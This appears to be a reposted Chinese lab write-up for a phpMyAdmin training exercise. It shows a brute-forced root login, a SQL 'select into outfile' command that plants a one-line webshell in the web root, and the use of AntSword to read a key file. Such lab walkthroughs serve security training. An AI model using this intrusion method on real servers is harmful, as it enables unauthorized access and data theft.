墨者学院——phpMyAdmin后台文件包含分析溯源
发布日期:2021-06-30 17:41:04 浏览次数:2 分类:技术文章

本文共 213 字,大约阅读时间需要 1 分钟。

此题利用一句话木马

进入登陆界面,用burpsuite爆破得到username与password都为:root

在这里插入图片描述

进入SQL界面,输入一句话木马(密码为leo),点击“执行”:

select "
" into outfile "/var/www/html/3.php"

(/var/www/html/ 是网站的根目录)

在这里插入图片描述

在这里插入图片描述

此时打开蚁剑(注意:url后面记得跟上一句话木马目标的页面3.php):

在这里插入图片描述

在根目录找到key.txt:

在这里插入图片描述

在这里插入图片描述

转载地址:https://leo-max.blog.csdn.net/article/details/104241799 如侵犯您的版权,请留言回复原文章的地址,我们会给您删除此文章,给您带来不便请您谅解!

上一篇:墨者学院——WSGI 漏洞复现(CVE-2018-7490)
下一篇:墨者学院——SQL注入漏洞测试(布尔盲注)

发表评论

最新留言

网站不错 人气很旺了 加油
[***.192.178.218]2024年04月28日 02时33分25秒